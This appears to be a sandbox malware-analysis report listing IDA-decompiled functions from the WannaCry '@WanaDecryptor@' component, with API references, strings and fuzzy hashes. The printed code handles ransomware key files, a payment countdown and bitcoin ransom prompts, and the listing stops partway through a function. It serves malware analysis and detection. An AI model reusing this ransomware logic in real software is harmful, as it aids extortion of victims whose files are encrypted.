You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
%08X.dky, xrefs: 0040180A
Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
API String ID: 2207195628-1375496427
Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}

APIs

sprintf.MSVCRT ref: 00401323
sprintf.MSVCRT ref: 00401339
GetFileAttributesA.KERNEL32(?), ref: 00401343
DeleteFileA.KERNEL32(?), ref: 0040139A
fread.MSVCRT ref: 00401405
fclose.MSVCRT ref: 00401408
sprintf.MSVCRT ref: 00401440
fopen.MSVCRT ref: 00401453

Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A

fopen.MSVCRT ref: 004013D5

Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658

Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB

Strings

%08X.eky, xrefs: 004014BB
00000000.res, xrefs: 004013CE
%08X.pky, xrefs: 0040131D
s.wnry, xrefs: 0040151B
%08X.res, xrefs: 0040143A
%08X.dky, xrefs: 00401333

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
API String ID: 2787528210-4016014174
Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56

Uniqueness

Uniqueness Score: -1.00%

Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

APIs

time.MSVCRT ref: 004076DA
sprintf.MSVCRT ref: 0040780E
SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
#540.MFC42 ref: 00407876
_ftol.MSVCRT ref: 004078AA
#2818.MFC42(?,$%d,00000000), ref: 004078BE
#2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
#2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
#2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
#3092.MFC42(00000402,?), ref: 0040791D
#6199.MFC42(00000402,?), ref: 00407924
InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
#800.MFC42 ref: 0040799F

Strings

%02d;%02d;%02d;%02d, xrefs: 00407808
%.1f BTC, xrefs: 004078EF
00;00;00;00, xrefs: 004076E8
Send %.1f BTC to this address:, xrefs: 00407903
Send $%d worth of bitcoin to this address:, xrefs: 004078CB
$%d, xrefs: 004078B8

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
API String ID: 993288296-3256873439
Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96

Uniqueness

Uniqueness Score: -1.00%

Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}

APIs

#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5

Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B

#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
#781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9

Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD

Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

#654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
#765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072

Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD

#609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
#609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
#616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
#641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE

Strings

#, xrefs: 00406061

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#800$#609#654#765#795$#616#641#781
String ID: #
API String ID: 2377847243-1885708031
Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}

APIs

#4710.MFC42 ref: 004032C5
CreateSolidBrush.GDI32(?), ref: 004032DC
#1641.MFC42(00000000), ref: 004032E9
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
#1641.MFC42(00000000), ref: 0040331F
#3092.MFC42(00000408,00000000), ref: 0040332B
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
#3092.MFC42(00000409), ref: 00403353
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
#3092.MFC42(00000002), ref: 00403372
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
#3092.MFC42(0000040E), ref: 00403394
SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
#3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC

Strings

Arial, xrefs: 004032EE
Path, xrefs: 004033CA

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
String ID: Arial$Path
API String ID: 2448086372-1872211634
Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
